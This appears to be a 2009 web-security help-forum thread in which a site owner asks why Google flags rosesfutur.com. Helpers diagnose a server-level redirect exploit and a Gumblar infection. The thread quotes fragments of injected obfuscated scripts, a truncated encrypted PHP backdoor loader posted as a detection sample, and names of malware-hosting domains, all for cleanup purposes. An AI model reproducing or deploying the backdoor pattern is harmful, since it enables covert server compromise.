Please check my site! this is really annoying for us!!!

Please check my site! This is really annoying for us!!!

7 months ago

Please, I cannot find anything about google is saying about our web, we do really need help from someone. I do really think this reporting system isn’t working at all…

Site is www.rosesfutur.com, thank you guys!!

<hr />

Of the 9 pages we tested on the site over the past 90 days, 5 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-12-13, and the last time suspicious content was found on this site was on 2009-12-12.

Malicious software includes 10 scripting exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.

Malicious software is hosted on 5 domain(s), including 51th.net/, active24.cz/, innotech.ru/.

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including innotech.ru/.

This site was hosted on 1 network(s) including AS16338 (AUNA).

<hr />

active24.cz, toomi.sk, dammekro.com, innotech.ru

by redleg

7 months ago

The file

http://www.rosesfutur.com/es/venta.html

is hacked.

by rosesfutur

7 months ago

This is the actual code for the file venta.html, If someone sees something special, please let me know…

CODE:

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.0 Transitional//EN”>
<html>
<head>
<meta>
<title>ROSES FUTUR S.A.</title>
<meta>
<meta>
<meta>
<meta>
<style type="text/css">

</style> </head> <body> <table> <tbody> <tr> <td>

</td> </tr> <tr> <td>

</td> </tr> <tr> <td> <img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=..%2Fimages%2Fbarra.jpg"> </td> </tr> <tr> <td>

Edificio Roger

</td> </tr> <tr> <td>

</td> </tr> <tr> <td>

Edificio Gravina

</td> </tr> <tr> <td>

</td> </tr> <tr> <td>

Edificio Guifré

</td> </tr> <tr> <td>

</td> </tr> <tr> <td>

Carrer Mairó

</td> </tr> <tr> <td>

</td> </tr> <tr> <td>

</td> </tr> </tbody> </table>

</body> </html>

by rosesfutur

7 months ago

I dont know why, but when I copy paste the code it doesn’t appear as is, so please if anyone can check the code? I See nothing special really…

http://www.rosesfutur.com/es/venta.html

by Kaleh

7 months ago

There’s a lot more going on here than just the file that redleg identified for you. I don’t have time to dig into it any further, but hopefully with a record of the things I ran into, someone else (possibly redleg) will be along to provide some additional feedback.

You might want to see what information you get through the Dashboard for your site in Google Webmaster Tools. The data that was returned through UnmaskParasites is not currently visible to me when I check that same page with RexSwain’s Http Viewer or Web-sniffer.net.

Check [Labs | Malware Details] as well as [Fetch as Googlebot] and let us know what you find.

http://www.google.com/safebrowsing/diagnostic?site=http://www.rosesfutur.com/&hl=en

http://wam.dasient.com/wam/diagnose?scan_id=164852

http://www.UnmaskParasites.com/security-report/?page=www.rosesfutur.com

Title:
URL: http://www .rosesfutur .com
Google: listed as suspicious?* how to resolve?
Last checked: 7 minutes ago (results are cached for 1 hour)
This report:
External References
- keygenguru .com safe? – displaying 5 of 44

serial number – http ://keygenguru .com
online movies – http ://keygenguru .com /movies .php
Buy Cakewalk Sonar 7.0 Producer Edition – http ://keygenguru .com /software /cakewalk-sonar-7-producer-edition .html
Buy Borland Developer Studio 2006 – http ://keygenguru .com /software/borland-developer-studio-2006 .html
Download Autodesk AutoCAD Revit Architecture Suite 2009 – http ://keygenguru .com /software /autodesk-autocad-revit-atchitecture-suite-2009 .html

- www .getcoolmovies .com safe? – displaying 1 of 1

Buy Avatar movie – http ://www.getcoolmovies .com/movies /countries /usa /avatar/

- supersoftwarestore .com safe? – displaying 1 of 1

cheap oem software – http ://supersoftwarestore .com

- buzz .yahoo .com safe? – displaying 5 of 30

Download Cirque du Freak: The Vampire’s Assistant – http ://buzz .yahoo .com /article /1:00be684a7bc2f9b14776630bc05dbd3a:b4637b2a21625f2854e317eeccca2d30/Download-Cirque-du-Freak-The-Vampires-Assistant-movie
Download Couples Retreat – http ://buzz .yahoo .com/article/1:00be684a7bc2f9b14776630bc05dbd3a:2d711a2b0741cb8f096f4ef60093c2f5/Download-Couples-Retreat-movie
Watch Bye-Bye Bin Laden – http ://buzz .yahoo .com/article/1:00be684a7bc2f9b14776630bc05dbd3a:9c331571a43c74f73d1f618f85fb28e7/Download-Bye-Bye-Bin-Laden-movie
Download The Maiden Heist – http ://buzz .yahoo .com/article/1:00be684a7bc2f9b14776630bc05dbd3a:f35ffdf9fc3036c1dc10670675f7f61f/Download-The-Maiden-Heist-movie
Download Four Christmases – http ://buzz .yahoo .com/article/1:00be684a7bc2f9b14776630bc05dbd3a:4249540223e743b58455abbf709e9627/Download-Four-Christmases-movie

Suspicious Inline Scripts
Script outside of <html>…</html> block

var rpjqs=new Date( ); rpjqs.setTime(rpjqs.getTime( )+12*60*60*1000); document.cookie="n\x5fses\x73…

Script outside of <html>…</html> block

document.write(String.fromCharCode(59+1,100,105,118,32,115,116,121,108,101,61,39,100,105,115,112,10….

active24.cz, toomi.sk, dammekro.com, innotech.ru

by denis

7 months ago

Hi,

The Unmask Parasites reports typical signs of server-level exploit. It works intermittently and is hard to detect (e.g. I don’t see it right now even using Unmask Parasites).

Here is the article that explains how this exploit works.
http://blog.unmaskparasites.com/2009/07/23/goscanpark-13-facts-about-malicious-server-wide-meta-redirects/

Show this article to your hosting provider, because you can’t solve the problem yourself. Every site on your server is affected. And the backdoor script that triggers the malicious Apache process may be in hidden somewhere in another site.

Moreover, it looks like your site had been infected with Gumblar (this time it is something that affected your site only). This means that your FTP credential had been stolen.
You can find more details about Gumblar and complete removal instructions here:
http://blog.unmaskparasites.com/2009/10/23/revenge-of-gumblar-zombies/

Denis – www.UnmaskParasites.com

gumblar goscanpark

by denis

7 months ago

To server admins:

Lately, hackers started to encrypt eval(base64_decode calls, so you may have problems locating backdoor scripts. Here is a sample of such an encrypted backdoor scrypt.

$PyIqJDl=‘#####e##############################v###a####l(b########a####s###e###########6##4##########_##d###eco###d####e#######(#\’ZXJyb3JfcmVwb3J0aW5WMEbGJtZGZ*removed a lot of code here*V2ZEdoCgkYyk7Cn0=\‘));’;
$PyIqJDl=str_replace(‘#’, ‘’, $PyIqJDl);$OOxbqtu=create_function(’’,$PyIqJDl);$OOxbqtu(); ?>

goscanpark

by rosesfutur

7 months ago

This is the actual code for the file venta.html, If someone sees something special, please let me know…

CODE:

" <!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.0 Transitional//EN”>
<html>
<head>
<meta>
<title>ROSES FUTUR S.A.</title>
<meta>
<meta>
<meta>
<meta>
<style type="text/css">

</style> </head> <body> <table> <tbody> <tr> <td>

</td> </tr> <tr> <td>

</td> </tr> <tr> <td> <img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=..%2Fimages%2Fbarra.jpg"> </td> </tr> <tr> <td>

Edificio Roger

</td> </tr> <tr> <td>

</td> </tr> <tr> <td>

Edificio Gravina

</td> </tr> <tr> <td>

</td> </tr> <tr> <td>

Edificio Guifré

</td> </tr> <tr> <td>

</td> </tr> <tr> <td>

Carrer Mairó

</td> </tr> <tr> <td>

</td> </tr> <tr> <td>

</td> </tr> </tbody> </table>

</body>

</html>"

by redleg

7 months ago

There is nothing suspicious. Your site is randomly serving a hacked page instead of the page that is requested.

by rosesfutur

7 months ago

Sorry, I don’t understand that… If there’s no problem in my page, what’s the problem??

by WeWatch

7 months ago

The server your website is on is intercepting http requests and returning infectious code which is why Denis said to get your hosting provider involved.

This also means that many other websites on the same webserver as your site, are also being affected.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com

by Kaleh

7 months ago

As Denis mentioned earlier, the problem is intermittent and difficult to catch. I got lucky when the original UnmaskParasites scan revealed the problem.

When visitors request pages of various sites on the server, they are intermittently served malicious content instead of the actual page that they requested. The problem will not surface every single time a particular page is requested, which makes it difficult to detect.

This is why Denis has referred you to the GoScanPark article and suggested that you show this to your hosting provider. Provide them with a link to this thread, in addition to the articles referenced.

by scripy

7 months ago

Your websites pages are still infected by Malicious code so follow given steps.

*First Scan your own computer and make sure that there will not be any kind of

Trojans/Malwares/Viruses are in your computer, clean up all stored password and don’t

store password in future on your computer, well first do this thing before going to given

steps,

*Second change FTP passwords and use complex passwords..

*Third download whole source code and find out this given Malicious/Suspicious code manually

and delete it from all web Pages…

*Forth then have to use Google Webtools (http://www.google.com/webmasters) for submitting

“Request for Review” which will removing that RED flag from your website.

Thanks
scripy
tech717@hotmail.com